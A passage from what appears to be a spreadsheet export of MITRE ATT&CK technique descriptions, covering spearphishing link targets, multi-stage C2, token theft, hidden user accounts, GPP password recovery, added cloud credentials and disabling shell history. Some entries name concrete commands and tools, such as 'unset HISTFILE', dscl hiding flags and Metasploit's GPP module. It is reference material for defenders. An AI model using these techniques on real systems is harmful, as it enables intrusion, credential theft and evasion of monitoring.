Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).
Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)
Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.
https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>T1657</t>
  </si>
  <si>
    <t>Financial Theft</t>
  </si>
  <si>
    <t>Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) 
Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)
Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)
Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)
https://attack.mitre.org/techniques/T1657</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Web Cookies</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)
https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>T1654</t>
  </si>
  <si>
    <t>Log Enumeration</t>
  </si>
  <si>
    <t>Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.
An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.
When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.
https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>T1021.007</t>
  </si>
  <si>
    <t>Cloud Services</t>
  </si>
  <si>
    <t>Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. 
Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as &lt;code&gt;Connect-AZAccount&lt;/code&gt; for Azure PowerShell, &lt;code&gt;Connect-MgGraph&lt;/code&gt; for Microsoft Graph PowerShell, and &lt;code&gt;gcloud auth login&lt;/code&gt; for the Google Cloud CLI.
In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password.
https://attack.mitre.org/techniques/T1021/007</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>T1027.012</t>
  </si>
  <si>
    <t>LNK Icon Smuggling</t>
  </si>
  <si>
    <t>Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. 
Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)
LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.
https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the &lt;code&gt;CreateAccessKey&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud iam service-accounts keys create&lt;/code&gt; command in GCP to add access keys to an account. Alternatively, they may use the &lt;code&gt;CreateLoginProfile&lt;/code&gt; API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) 
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)
In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)
https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value &lt;code&gt;Hide500Users&lt;/code&gt; to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the &lt;code&gt;Hide500Users&lt;/code&gt; key value is set to &lt;code&gt;TRUE&lt;/code&gt;, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the &lt;code&gt;dscl&lt;/code&gt; utility to create hidden user accounts by setting the &lt;code&gt;IsHidden&lt;/code&gt; attribute to &lt;code&gt;1&lt;/code&gt;. Adversaries can also hide a user’s home folder by changing the &lt;code&gt;chflags&lt;/code&gt; to hidden.(Citation: Apple Support Hide a User Account) 
Adversaries may similarly hide user accounts in Windows. Adversaries can set the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; Registry key value to &lt;code&gt;0&lt;/code&gt; for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the &lt;code&gt;gsettings&lt;/code&gt; command (ex: &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.
https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.
https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)
https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command. Adversaries may also opt to enumerate processes via `/proc`. 
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt; can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. 
